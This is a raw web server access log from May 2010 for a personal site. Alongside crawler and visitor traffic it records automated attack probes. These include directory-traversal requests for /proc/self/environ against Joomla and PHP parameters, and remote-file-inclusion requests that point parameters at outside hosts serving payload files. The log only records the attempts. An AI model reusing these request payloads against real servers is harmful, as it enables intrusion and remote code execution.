72.148.89.47 - - [20/May/2010:21:47:58 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
72.148.89.47 - - [20/May/2010:21:47:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
87.250.255.243 - - [20/May/2010:21:48:41 -0500] "GET /logs/access_log.1209081600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:21:53:28 -0500] "GET /logs/access_log.1185926400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.98.234.186 - - [20/May/2010:21:54:25 -0500] "GET /logs/access_log.1224288000 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
74.52.35.234 - - [20/May/2010:21:54:56 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
195.159.29.178 - - [20/May/2010:21:54:57 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
87.250.255.243 - - [20/May/2010:21:57:45 -0500] "GET /logs/access_log.1246838400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:21:57:48 -0500] "GET /logs/access_log.1244505600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:22:01:00 -0500] "GET /logs/access_log.1266624000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
198.170.141.58 - - [20/May/2010:22:06:08 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:22:07:22 -0500] "GET /logs/access_log.1239580800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/May/2010:22:09:01 -0500] "GET /logs/access_log.1204416000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
198.170.141.58 - - [20/May/2010:22:09:33 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
198.170.141.58 - - [20/May/2010:22:09:46 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:22:13:49 -0500] "GET /logs/access_log.1243209600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [20/May/2010:22:15:13 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:22:15:13 -0500] "GET /logs/access_log.1270512000//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:22:15:14 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.46.199.182 - - [20/May/2010:22:17:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
198.170.141.58 - - [20/May/2010:22:18:15 -0500] "GET /logs/access_log.1273017600//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
198.170.141.58 - - [20/May/2010:22:18:16 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
198.170.141.58 - - [20/May/2010:22:18:16 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6405 "-""libwww-perl/5.805"
198.170.141.58 - - [20/May/2010:22:18:51 -0500] "GET /logs/access_log.1273017600//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
198.170.141.58 - - [20/May/2010:22:18:51 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
198.170.141.58 - - [20/May/2010:22:18:51 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6405 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:22:19:33 -0500] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [20/May/2010:22:19:51 -0500] "GET /logs/inc/cmses/aedating4CMS.php?dir[inc]=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:22:19:51 -0500] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:22:19:51 -0500] "GET /logs/access_log.1266537600/inc/cmses/aedating4CMS.php?dir[inc]=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:22:20:05 -0500] "GET /logs/access_log.1264118400/inc/cmses/aedating4CMS.php?dir[inc]=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.159.29.178 - - [20/May/2010:22:20:22 -0500] "GET /logs/access_log.1273276800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
195.159.29.178 - - [20/May/2010:22:20:22 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
195.159.29.178 - - [20/May/2010:22:20:23 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
218.38.34.19 - - [20/May/2010:22:21:01 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
218.38.34.19 - - [20/May/2010:22:21:08 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.38.34.19 - - [20/May/2010:22:21:08 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 6407 "-""Mozilla/5.0"
211.239.161.143 - - [20/May/2010:22:22:13 -0500] "GET /phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-"""
216.180.226.34 - - [20/May/2010:22:22:13 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""-"
211.239.161.143 - - [20/May/2010:22:22:13 -0500] "GET /phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-"""
211.239.161.143 - - [20/May/2010:22:22:14 -0500] "GET /phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-"""
211.239.161.143 - - [20/May/2010:22:22:15 -0500] "GET /logs/phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-"""
211.239.161.143 - - [20/May/2010:22:22:16 -0500] "GET /logs/phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""